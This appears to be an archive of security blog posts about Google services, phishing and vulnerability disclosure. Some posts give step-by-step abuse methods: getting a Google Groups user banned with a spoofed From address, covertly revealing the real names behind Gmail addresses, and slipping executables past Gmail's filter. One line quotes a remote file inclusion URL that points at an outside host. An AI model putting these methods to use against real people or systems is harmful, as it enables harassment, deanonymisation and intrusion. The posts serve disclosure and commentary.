CyberSec Tips: E-Commerce – tip details 1 – search engines

Our local paper, like just about everyone else, recently published a set of tips for online shopping.  (They got them from Trend Micro Canada.)  The tips are mostly OK, as far as they go, but I figured they could use a little expansion.

“Don’t rely on search engines to find a shopping site.

“Search results can lead to malicious websites that will take your credit card and other confidential data or infect your computer with a virus. Instead, bookmark reliable online shopping sites.”

As a general rule, it’s best to be careful whenever you go to a site that is new or unknown to you.  However, I’d have to take this tip with a grain of salt.  I did a (Google) search on London Drugs, a chain in Western Canada (widely known in the tech community for their computer departments) (about which I have written before), and the first five pages gave results that were all from, or legitimately about, that company.  Quick checks on other retailers got similar results.

It makes sense to bookmark a “known good” link if you shop someplace regularly.  But if you are going to a new site, you can get into just as much trouble by guessing at a domain name, or even just fumbling typing the URL.  Fraudsters will register a number of domain names that are very similar to those of legitimate companies; just a character or so off; knowing that slipping fingers will drive people to their sites.  Some of those malicious sites look very much like the real thing.  (Others, promoting all kinds of questionable services and deals, are obviously false.)

Always be careful, and suspicious.  If anything seems off, get out of there, and maybe do a bit of research before you try again.  But don’t just avoid search engines as a matter of course.


Has your email been “hacked?”

I got two suspicious messages today.  They were identical, and supposedly “From” two members of my extended family, and to my most often used account, rather than the one I use as a spam trap.  I’ve had some others recently, and thought it a good opportunity to write up something on the general topic of email account phishing.

The headers are no particular help: the messages supposedly related to a Google Docs document, and do seem to come from or through Google.  (Somewhat ironically, at the time the two people listed in these messages might have been sharing information with the rest of us in the family in this manner.  Be suspicious of anything you receive over the Internet, even if you think it might relate to something you are expecting.)

The URLs/links in the message are from TinyURL (which Google wouldn’t use) and, when resolved, do not actually go to Google.  They seem to end up on a phishing site intended to steal email addresses.  It had a Google logo at the top, and asked the user to “sign in” with email addresses (and passwords) from Gmail, Yahoo, Hotmail, and a few other similar sites.  (The number of possible Webmail sites should be a giveaway in itself: Google would only be interested in your Google account.)

Beware of any messages you receive that look like this:

——- Forwarded message follows ——-
Subject:            Important Documents
Date sent:          Mon, 5 Aug 2013 08:54:26 -0700
From:               [a friend or relative]

How are you doing today? Kindly view the documents i uploaded for you using
Google Docs CLICK HERE <hxxp://>.
——- End of forwarded message ——-

That particular site was only up briefly: 48 hours later it was gone.  This tends to be the case: these sites change very quickly.  Incidentally, when I initially tested it with a few Web reputation systems, it was pronounced clean by all.

This is certainly not the only type of email phishing message: a few years ago there were rafts of messages warning you about virus, spam, or security problems with your email account.  Those are still around: I just got one today:

——- Forwarded message follows ——-
From:               ”Microsoft HelpDesk” <>
Subject:            Helpdesk Mail Box Warning!!!
Date sent:          Wed, 7 Aug 2013 15:56:35 -0200

Helpdesk Mail Support require you to re-validate your Microsoft outlook mail immediately by clicking: hxxp://

This Message is From Helpdesk. Due to our latest IP Security upgrades we have reason to believe that your Microsoft outlook mail account was accessed by a third party. Protecting the security of your Microsoft outlook mail account is our primary concern, we have limited access to sensitive Microsoft outlook mail account features.

Failure to re-validate, your e-mail will be blocked in 24 hours.

Thank you for your cooperation.

Help Desk
Microsoft outlook Team
——- End of forwarded message ——-

Do you really think that Microsoft wouldn’t capitalize its own Outlook product?

(Another giveaway on that particular one is that it didn’t come to my Outlook account, mostly because I don’t have an Outlook account.)

(That site was down less than three hours after I received the email.

OK, so far I have only been talking about things that should make you suspicious when you receive them.  But what happens if and when you actually follow through, and get hit by these tricks?  Well, to explain that, we have to ask why the bad guys would want to phish for your email account.  After all, we usually think of phishing in terms of bank accounts, and money.

The blackhats phishing for email accounts might be looking for a number of things.  First, they can use your account to send out spam, and possibly malicious spam, at that.  Second, they can harvest email addresses from your account (and, in particular, people who would not be suspicious of a message when it comes “From:” you).  Third, they might be looking for a way to infect or otherwise get into your computer, using your computer in a botnet or for some other purpose, or stealing additional information (like banking information) you might have saved.  A fourth possibility, depending upon the type of Webmail you have, is to use your account to modify or create malicious Web pages, to serve malware, or do various types of phishing.

What you have to do depends on what it was the bad guys were after in getting into your account.

If they were after email addresses, it’s probably too late.  They have already harvested the addresses.  But you should still change your password on that account, so they won’t be able to get back in.  And be less trusting in future.

The most probable thing is that they were after your account in order to use it to send spam.  Change your password so that they won’t be able to send any more.  (In a recent event, with another relative, the phishers had actually changed the password themselves.  This is unusual, but it happens.  In that case, you have to contact the Webmail provider, and get them to reset your password for you.)  The phishers have probably also sent email to all of your friends (and everyone in your contacts or address list), so you’d better send a message around, ‘fess up to the fact that you’ve been had, and tell your friends what they should do.  (You can point them at this posting.)  Possibly in an attempt to prevent you from finding out that your account has been hacked, the attackers often forward your email somewhere else.  As well as changing your password, check to see if there is any forwarding on your account, and also check to see if associated email addresses have been changed.

It’s becoming less likely that the blackhats want to infect your computer, but it’s still possible.  In that case, you need to get cleaned up.  If you are running Windows, Microsoft’s (free!) program Microsoft Security Essentials (or MSE) does a very good job.  If you aren’t, or want something different, then Avast, Avira, Eset, and Sophos have products available for free download, and for Windows, Mac, iPhone, and Android.  (If you already have some kind of antivirus program running on your machine, you might want to get these anyway, because yours isn’t working, now is it?)

(By the way, in the recent incident, both family members told me that they had clicked on the link “and by then it was too late.”  They were obviously thinking of infection, but, in fact, that particular site wasn’t set up to try and infect the computer.  When they saw the page asked for their email addresses and password, it wasn’t too late.  if they had stopped at that point, and not entered their email addresses and passwords, nothing would have happened!  Be aware, and a bit suspicious.  It’ll keep you safer.)

When changing your password, or checking to see if your Web page has been modified, be very careful, and maybe use a computer that is protected a bit better than your is.  (Avast is very good at telling you if a Web page is trying to send you something malicious, and most of the others do as well.  MSE doesn’t work as well in this regard.)  Possibly use a computer that uses a different operating system: if your computer uses Windows, then use a Mac: if your computer is a Mac, use an Android tablet or something like that.  Usually (though not always) those who set up malware pages are only after one type of computer.


Sonicwall Vulnerability Fixed

A month ago I complained about Sonicwall and google brushing us off when we reported vulnerabilities to them. The good news: Sonicwall has since contacted us, acknowledged the problem and is now rolling out a fix.

Was I too harsh on Sonicwall? It was hard to get their initial attention, but once we did they cooperated in an exemplary way. I’m not fooling myself to think any researcher that will notify them of a problem will get the same level of attention, but obviously they do give a damn, and maybe security@sonicwall will be open for notifications from now on.


Why Is Free Vuln Disclosure so Damn Difficult?

Xyberpix described how difficult it is to disclose vulnerabilities to ZDI and iDefense. But even after you sold it, the process is just beginning. Sure, the researcher gets paid and he is free to resume his work, but the work us, the vulnerability coordinator, just begins.

We recently received 2 disclosures to our SecuriTeam Secure Disclosure program for Sonicwall and google vulnerabilities. We received sponsors for both vulnerabilities which means there is a commercial organization out there that was willing to pay the researcher for their efforts. That part ended well for the researchers.

Now both organizations want the vendors to patch up. Sounds easy, right? We are giving Sonicwall and google free information about security holes in their products, and want nothing in return except for them to fix it.

Well, it’s damn difficult.

Google is always difficult when it comes to security. When I reported an information disclosure vulnerability in google calendar they ignored me, then sent their PR person to say “it’s a feature”, then silently fixed it claiming it was never there. Dealing with google on security issues is like talking to a girl that speaks a foreign language. But more on that later – lets start with Sonicwall.

Wouldn’t you be expect security vendors to be more aware of security problems in their products? Well, for the last few weeks we’ve tried to bang every door, calling in personal favors to tell Sonicwall (for free, let me remind you) about a security hole in their product.
Why bang every door? Because they won’t talk to us since “we’re not Sonicwall customers”. We can’t open a support ticket and they won’t give “us” support. security@sonicwall? yeah, right. Even good friends couldn’t help. The system will not accept a report from non-customers.

I guess our only course of action is to pay Sonicwall money to let them know about their vulnerabilities. I wonder if that’s Sonicwall’s long term strategy for profit? BTW, if you work for Sonicwall and can help, please contact me – but keep in mind paying Sonicwall for telling them about their own security issues is not a part of our plan.

Back to google. The story there is simple and boring. It’s not a bug, it’s a feature. In fact, every browser has this problem, errm I mean feature. In fact, it’s been proven you can execute javascript on the chrome user’s browser so we’ll leave this open as well. If the stupid web app developers can’t solve this we certainly aren’t going to help them.
But why am I boring you with the broad strokes, go read the discussion: Nothing we haven’t seen with previous google security bug handling, just ask this guy.

Yes, it is 2010, and we are still talking about Vulnerability Disclosure to vendors. I guess next we’ll be arguing if heap overflows are exploitable.

Update: We were contacted by Sonicwall and the bug will be looked at. Hopefully security@sonicwall will start accepting submissions from non-customers.


Google and security. Oil and Water. (Or: How to DoS google groups)

The buzz was on about google buzz sharing your list of contacts (which they then quickly fixed in their casual we-did-nothing-wrong-these-are-not-the-droids-you’re-looking-for mind trick).

Readers of this blog remember when google calendar let you see the full name behind every gmail address. At that time, google ignored, then decided there’s nothing wrong with that feature, then fixed it. Only it still works, on other google services. Of course, these aren’t the droids I’m looking for.

Well, here’s a method to DoS a google group user; it was discovered by Shachar Shemesh of lingnu about 18 months ago, who told google and was answered with a strong silence. With google the only disclosure seems to be full-disclosure, so with apologies to you google-group users out there, here is the outline of the attack below.

DoS’ing google groups
Domain-Key is a good method to prevent spam from coming in, as well as preventing unwanted emails from being handled if they are sent through “the wrong” SMTP server.

Google has taken domain-key a step further, with their Domain-Key and Google Groups combo. In this combination, if an email is sent to a Google Groups from an SMTP server who is not listed in the Domain-key record, that email will be banned from writing or accessing the Google Group in question.

The banned user will no longer be able to write or read from that group, will not be able to “undo” this change as emails to Google’s technical support regarding this appear to go unanswered.

From this background, the attack seems clear. A malicious attacker can get pretty much anyone banned from a certain Google Group.

Steps to reproduce:

  • Subscribe to a Google group.
  • Look for a victim (Anyone posting to the group from a account is fair game).
  • Configure your email client to send emails with a “From” field that matches this email address, and use an SMTP that is not one of those authorized by the domain key. Your ISP’s SMTP servers will probably suffice.
  • Use this configurations to send an email to the group. It doesn’t really matter what the email content is, but I recommend making it look like a genuine email to make is harder to filter (and raise ‘plausible deniability’ in case someone comes asking questions).

As a result:
The victim will be automatically banned from the group.

He or She will receive no notification of that fact: not to the fact he or she was banned, and not even to the fact that the email he or she supposedly sent failed Domain key verification.

The victim will cease to receive emails from the group. They will only find out about it if they try to send an email, at which point they will receive a brief and unhelpful message saying they were banned, with no explanation why and no means to appeal.

Trying to access the group from the web site will result in a “you are banned” message, again, with no helpful information on why the ban was instated nor how to appeal. It is a curious point that even information that is publicly available without registration, such as the group’s archive or description, will be blocked. They will have to sign out of Google to be able to see it(!).

The best means to appeal she is likely to find is “Google Help”, which points to an email address where past experience shows the request email will be unceremoniously ignored, just like Shachar’s email notifying google of this vulnerability.


The Internet May Harm your computer!

I have just Googled up some Securiteam pages. Can you imagine my shock when I saw the Google Alert Saying Securiteam can harm my computer?

Active Network Scanning Hacked

Isn’t that great?

Just before I push the Panic Button, I Googled up one more term.

This is what I got:
Site Google Hacked

When I saw this one, I relaxed.

On regular days when you see the message saying “This site may harm your computer” it means that google believes that this site may install malicious software on your computer.
Today Google’s Safe Browsing feature probably freaked out for some reason.

In any case, according to Google, the whole Internet can harm your computer right now, so be careful!

Update: Marissa Mayer wrote in the google blog that the problem happened because the URL of ‘/’ was mistakenly added to the ‘bad sites’ file and ‘/’ expands to all URLs. She also wrote that this problem started at  6:27 a.m. and ended at 7:25 a.m. PST.

SecuriTales is a secure proxy service that allows internet users to unblock facebook, unblock twitter, unblock youtube and unblock google


Gmail Attachment Filter

I ran across something interesting today. A friend asked me to send him a certain exe to his email. Not thinking much about it, I composed an email on my gmail, attached the exe, hit send and then seen an error in which basically told me google doesn’t allow exes to be sent through gmail.

Irritating enough, but seemingly familiar, I decided to ‘get smart’ and zip the exe in a folder and send it. Same thing.


I also tried gzipping the archive and sending it.. didn’t work either.

I finally compressed the folder+exe to make a bz2 archive and sent it away. Worked like a charm.

Where was Google attachment filters then!? *grin*


Snoop on Google Talk (Wiretap)

Yes snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting that unlike other chat clients like Skype, MSN and others GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, probably stems from the fact that Google supports web based chat in a constantly refreshing web page (unlike MSN which launches a separate window) allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing – basically never needing to logon/logoff on my PC/BlackBerry they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection :D


Everything new is old again – Native Client

Google has garnered a lot of interest, over the past day or two, with its radically new idea, released under the name Native Client.  You can read the announcement at or download the research paper (in PDF) at
That idea sounded so familiar I just knew it had to have been done before.

It has.  It’s just a dressed up version of an activity monitor.  The oldest form of AV actually implemented.  In fact, it dates back to the days just slightly before the first PC viruses, when people were trying to prevent damage by some of the early PC trojans that were being shared on BBSes.

Or, if they take it far enough, and if you like, you can call it a form of virtual machine.  And we are back to


Hi Goog, where is your user agent?

Net Applications reported this week that one third of the traffic coming from Google’s facilities has no user agent. This report refers specifically to the traffic coming from Google’s employees and not the Search Engine’s traffic.
Vince Vizzaccaro, a senior executive from Net Applications said that they had never seen an OS stripped off the user agent string before. “you have to arrange to have that happen, it’s not something we’ve seen before with a proxy server.”
So what’s Google hiding? Of course, Google, like Google wouldn’t comment on rumors and speculations.

What do you think? Why would they hide their UA?


My Baby’s Birth

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu


Wired network compromised during the Google developer conference in Israel

Calcalist reports that the wired network in a recent google developers conference in Israel was hacked during the conference. I haven’t seen that report anywhere else, but the reporter Dora Kishinevski is fairly level headed with little tendency for sensational stories so I’m marking it as probably true.

According to the article, google sent a follow up email to the participants and warned them the network was compromised. This is interesting first because the attack was on the wired and not wireless Internet, which is considerably harder to do without being caught, and second because it reminds us how insecure gmail is over compromised lines (as opposed to, for example, a corporate VPN). I’m willing to bet close to 100% of the participants used gmail while in the google conference.

The article also quotes google as writing “We recommend you change your password, just in case, to any site you visited using the wired connection”. Definitely.


Who has the keys to your business?

SearchEngineJournal has a story about this guy that gave the keys to his business to Google. Well, not exactly the keys, but he used a Gmail account for all his business emails, and had used the same account for his Google Analytics, Webmaster Tools and his own Google Adsense account.
And then one day he woke up and found out that Google disabled his Google account.

google account disabled
From that moment on, not only his Adsense income stopped and he couldn’t access any email he kept in his Gmail Inbox, but all the emails sent to him by his customers were routed to a voided account.
I can’t even think how to start handling such a crisis. What do you do first? I have a few ideas but that’s for a different post.

What the hell was he thinking about when he gave Google the keys to his business?

If you still want to use a Google account for your business there are a few things you should do:
1. Make sure you backup your account on a regular basis.

2. Get your own domain and use Google Apps. This way in case of emergency you can change your MX Records back you to your original hosting whitin a few hours.

3. Never use your personal account for your Google Adwords.

4. Never use your personal account for your Google Analytics.

5. Never Ever use your personal account for your Google Adsense.

Don’t let them catch you unprepared.


Google: we will share your name with anyone who asks us for it

Here’s what happens when you try to bury a security vulnerability by fixing it silently and not telling anyone: all other similar vulnerabilities remain unfixed.

When I started a challenge yesterday to find a different way to find the full name behind a user’s gmail address I had a specific method in mind – a weakness in google docs that shows the full name of a person when you share a document (description and screen shots below). But it appears this problem is more widespread – it affects google maps, and perhaps other apps as well (there seems to be a difference between various localized versions of the google applications, so YMMV). Andre claims that he’d known about this for 2.5 years ago, and I wonder who else have known (spammers using this method to personalize the mails sent to gmail addresses?). All of this could have been prevented if google came out with a simple advisory explaining the problem and their stand on it. If they really wanted to fix it (and not just silence the press about the previous problem) people would have notified them about the other problems so that they can address them. Instead, they sent a PR drone to deny this is really a problem, while a programmer patched it without giving thought to the other google applications.

I’d be happy to hear from anyone on google’s security or development team – I promise to post their response verbatim and I’m curious to hear what they have to say. Notice, however, that I couldn’t care less about their PR response. If your position in google is marketing, don’t bother replying – this is a security issue and not a marketing issue – it’s time google addresses it for what it is.

And for those who were patient enough to go through my rant, here’s a step-by-step explanation provided by Vincent Claeys on how to reveal the real name behind the gmail address. Kudos to Naftali Shpitzer, Vincent Claeys and Andre Gironda for finding the way (and other ways I haven’t thought of…) to solve the problem.

1. Log in to your gmail account
2. Click documents on the left top
3. Create a presentation, save it, close it
4. In the list with presentations, select the presentation you just made
5. Click the “share” button
6. Type in the e-mail address of which you want to find out the real name
7. Click “invite” (I always use “as viewers”, but “as collaborators”
will work as well I guess)

8. Click “skip sending invitation”

9. Click “ok” in the warning window
10. Click on the presentation to open it (a new window will open)
11. Click on the “share” tab on the right top corner
12. Read the real name of the person you invited :-)

13. Remove the invited person from the list again so he doesn’t notice
anything when he logs into his gmail account :-)


How to find the real name behind the gmail address, round 2

As you can see from the comments in my previous post, google has fixed the google calendar problem that allowed gmail users to see other users’ full names. Obviously, many people are disappointed – that’s the downside of web services: once a vulnerability is fixed, it’s fixed for everyone, immediately :-)

But Yair, SEO expert by day and curious individual by night, told me about a different way to do the attack. This attack works on both gmail and google app users, and is completely stealth – unlike the google calendar attack that notifies the victim, this one can be conducted without them knowing.

So what should I do with this information? Contacting the google security team is like typing Shakespeare into /dev/null, as anyone who ever tried to report a security vulnerability to google probably knows – it’s amazing to see the difference between the hostile google security team and the Microsoft security team who is trying hard (sometimes a little too hard) to be researcher friendly. So contacting google security is pretty much not an option.

The other ‘default’ option is to go full disclosure. But in this case, disclosing a bug in google will result in them claiming the bug is actually a feature, and then fixing it silently without any acknowledgment while chanting softly: “There was no bug. These aren’t the droids you’re looking for. Move along”. None of you will get a chance to test it, because by the time you do the problem would be fixed and we have never been at war with Eurasia.

So how do I give the smart readers a chance to try it out without alerting the world media? Simple: I will give you a chance to try it out before I disclose it. A smart and energetic researcher should be able to find this bug based on the hints in this page. You might even find holes different then what Yair did. This should be fun…

To give the proper incentive, if you find the hole, try to get the full name of the gmail email Use the full name as a coupon code to get a free account on our vulnerability scanning service to scan your server from the Internet on an ongoing basis. Just sign up here and use the real name of the gmail user above as the coupon code.  If you don’t have a server to scan for vulnerabilities or don’t feel like signing up, send me the answer to aviram at and I will mention you on this page. But be quick, the google QA team may find it before you. When enough people find it, or google fixes it, I’ll publish the way along with some screenshots. That is, if the truth ministry doesn’t get to me first.

Oh, and the question you are all dying to ask – is no longer ‘smart ass’. It’s now just boring old “Admin”, but then again it always has been.


gmail https – not for everyone

A few weeks ago, Google added an option to force your Gmail connection to https instead of http. This feature was great news for people like me who use public networks a lot.
I was looking for that feature in my settings page but couldn’t find anything that looks like it. I stopped looking for it and today when looking for something else, I found the reason why I didn’t get this feature.
I’m using Google Apps for my domain, and apparently my Google Apps account simply doesn’t have this feature. Only my Gmail account has it!

This is how the setting page of my Gmail account looks like:

This is how my Google Apps setting page looks like:

I can’t think of a good reason for Google to make a Google Apps account less secure than a Gmail account. I can only hope that it’s a matter of time and it is not one of those features that will never be included in Google Apps.

In any case, if you are using Google Apps you can still use a secured connection.
Instead of going to , take your browser to
That will make your connection https instead of http.

Google had supported https for Gmail from day 1. The thing is, it was kind of a secret and if you didn’t look for it, or didn’t have somebody to tell you about it, you would still be using http. As a matter of fact, I doubt it if more than a tiny fraction of Gmail users have ever heard of https and know if it’s good or bad.

Security should be built over security awareness. Without awareness real security will never happen. Employees who write classified documents should be aware of the document classification they work on. It is not enough to tell them that their document is classified. They need to know about classification and think about classification and understand what classification means when dealing with it.
The same way that people know not to keep their ATM card PIN code in their wallet, (the bank helped them to raise their security awareness) Google must help their users raise their security awareness and know not only that https is available for Gmail but also that https is so much safer than http and should be used by default.

I doubt it if the majority of people will ever use the secured connection for Gmail. Such a feature requires education and Google will never do that. Since https is significantly slower than http, and since most people don’t know about security and don’t really care about security, this feature is probably just another feature for the readers of this blog, and their family and friends.

Update: I checked gmail corporate user iphone vpn comment, and he is right. My gemstones shop uses the free version of Google Apps. The paid version has a feature called “SSL enforcement for secure HTTPS access” that is included in the paid version only (no.4 in “Collaboration application features”).To be honest, I don’t think I have the right to complain about something I got for free. I also have customers that are paying for premium features that cost me nothing, features that are there just to make the customers upgrade to the Advanced Plan. I guess this is not a mistake and someone wants me to upgrade. Fair enough.